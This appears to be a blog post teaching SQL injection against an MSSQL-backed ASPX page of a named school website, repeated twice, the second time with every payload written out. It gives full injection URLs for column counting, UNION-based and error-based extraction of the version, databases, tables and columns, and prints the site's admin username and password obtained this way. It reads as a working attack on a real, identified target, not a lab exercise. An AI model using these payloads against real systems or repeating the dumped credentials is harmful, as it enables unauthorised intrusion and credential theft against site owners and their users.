This is how i injected mssql server or .aspx.
vul link=http://ogis.edu.in/ViewPhoto.aspx?gid=46
1st way:
Finding version:
Finding database:
I will not go for deep about this method.There is already tutorial about it here.
2nd way:
1.Finding no of columns:
it loads normal.Thats good.
output:
![[Image: 54025460.jpg]](http://img825.imageshack.us/img825/2839/54025460.jpg)
so lets reduce it
Page loads normal.So there are 9 columns.
2. Next we do UnIOn all seLect .
Remember in mssql with aspx you will never get vul columns.You have to find it manually.
output:
![[Image: 54898417.jpg]](http://img843.imageshack.us/img843/7888/54898417.jpg)
Dont worry.Now two ways from here.
1 way (easy) : this way will work rarely and its normal injection.
Just change gid=46 to gid=-46.
so injection will be
output:
![[Image: 50983947.jpg]](http://img707.imageshack.us/img707/4471/50983947.jpg)
vul col=2
version=
@@version gives version in mssql .
Remember version() will not work here.
user=
You can also use current_user , user , system_user instead of user_name() .
database=
db_name() gives primary database.
Now replace db_name() with db_name(1),db_name(2),..,db_name(n) till you get databases.
This gives all databases in one.
![[Image: 93957090.jpg]](http://img214.imageshack.us/img214/9743/93957090.jpg)
Tables=
Here !=db_name() means other than primary database.
So we get tables of other databases. spicy table is o_adminmst.
![[Image: 82377563.jpg]](http://img811.imageshack.us/img811/2162/82377563.jpg)
columns=
![[Image: 53670075.jpg]](http://img843.imageshack.us/img843/7721/53670075.jpg)
data=
username=admin
pass=admin123#.
2nd way(important) : This way will work with UnIoN in many sites and challenges.
Lets You stuck here :
Now replace all columns with NULL
so it will like
Now starts replacing every null with convert(int,@@version) or cast(version() as int).
In my case replacing with first null gives answer.
![[Image: 52115856.jpg]](http://img39.imageshack.us/img39/552/52115856.jpg)
user=
output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int.
You can also use current_user , user , system_user instead of user_name() .
database=
output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int.
Tables=
output=Conversion failed when converting the nvarchar value 'o_updatemst' to data type int.
for next table
output=Conversion failed when converting the nvarchar value 'o_pagemaster' to data type int.
columns=
Conversion failed when converting the nvarchar value 'adminid' to data type int.
for next column same as table
Conversion failed when converting the nvarchar value 'username' to data type int.
data=
Conversion failed when converting the varchar value 'admin' to data type int.
Conversion failed when converting the varchar value 'admin123#' to data type int.
You can use %2b to get username and password at one time.
%2b=+
Conversion failed when converting the varchar value 'admin/admin123#' to data type int.
Thants it.
vul link=http://ogis.edu.in/ViewPhoto.aspx?gid=46
1st way:
Finding version:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=cast(@@version as int)
Finding database:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=convert(int,db_name())
I will not go for deep about this method.There is already tutorial about it here.
2nd way:
1.Finding no of columns:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 1-- -
it loads normal.Thats good.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 10-- -
so lets reduce it
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 9-- -
Page loads normal.So there are 9 columns.
2. Next we do UnIOn all seLect .
Remember in mssql with aspx you will never get vul columns.You have to find it manually.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
Dont worry.Now two ways from here.
1 way (easy) : this way will work rarely and its normal injection.
Just change gid=46 to gid=-46.
so injection will be
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
vul col=2
version=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,@@version,3,4,5,6,7,8,9-- -
Remember version() will not work here.
user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,user_name(),3,4,5,6,7,8,9-- -
You can also use current_user , user , system_user instead of user_name() .
database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(),3,4,5,6,7,8,9-- -
Now replace db_name() with db_name(1),db_name(2),..,db_name(n) till you get databases.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(1),3,4,5,6,7,8,9-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(11),3,4,5,6,7,8,9-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,schema_name,3,4,5,6,7,8,9 from information_Schema.schemata-- -
Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46
UNION all SELECT 1,table_name,3,4,5,6,7,8,9 from
information_Schema.tables where table_schema!=db_name()-- -
So we get tables of other databases. spicy table is o_adminmst.
columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46
UNION all SELECT 1,column_name,3,4,5,6,7,8,9 from
information_Schema.columns where table_name='o_adminmst'-- -
data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,username,3,4,5,6,7,8,9 from o_adminmst-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,password,3,4,5,6,7,8,9 from o_adminmst-- -
2nd way(important) : This way will work with UnIoN in many sites and challenges.
Lets You stuck here :
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
Now replace all columns with NULL
so it will like
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT null,null,null,null,null,null,null,null,null-- -
Now starts replacing every null with convert(int,@@version) or cast(version() as int).
In my case replacing with first null gives answer.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,@@version),null,null,null,null,null,null,null,null-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(@@version as int),null,null,null,null,null,null,null,null-- -
user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(user_name() as int),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the nvarchar value 'db_ogis' to data type int.
You can also use current_user , user , system_user instead of user_name() .
database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(db_name() as int),null,null,null,null,null,null,null,null-- -
output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int.
Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 table_name from
information_schema.tables where table_schema!=db_name()))
,null,null,null,null,null,null,null,null-- -
output=Conversion failed when converting the nvarchar value 'o_updatemst' to data type int.
for next table
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 table_name from
information_schema.tables where table_schema!=db_name() and
table_name<>'o_updatemst'))
,null,null,null,null,null,null,null,null-- -
output=Conversion failed when converting the nvarchar value 'o_pagemaster' to data type int.
columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 column_name from
information_schema.columns where table_name='o_adminmst'))
,null,null,null,null,null,null,null,null-- -
Conversion failed when converting the nvarchar value 'adminid' to data type int.
for next column same as table
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 column_name from
information_schema.columns where table_name='o_adminmst' and
column_name<>'adminid'))
,null,null,null,null,null,null,null,null-- -
Conversion failed when converting the nvarchar value 'username' to data type int.
data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 username from o_adminmst))
,null,null,null,null,null,null,null,null-- -
Conversion failed when converting the varchar value 'admin' to data type int.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 password from o_adminmst))
,null,null,null,null,null,null,null,null-- -
Conversion failed when converting the varchar value 'admin123#' to data type int.
You can use %2b to get username and password at one time.
%2b=+
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 username%2b'/'%2bpassword
from o_adminmst)) ,null,null,null,null,null,null,null,null-- -
Conversion failed when converting the varchar value 'admin/admin123#' to data type int.
Thants it.
No comments:
Post a Comment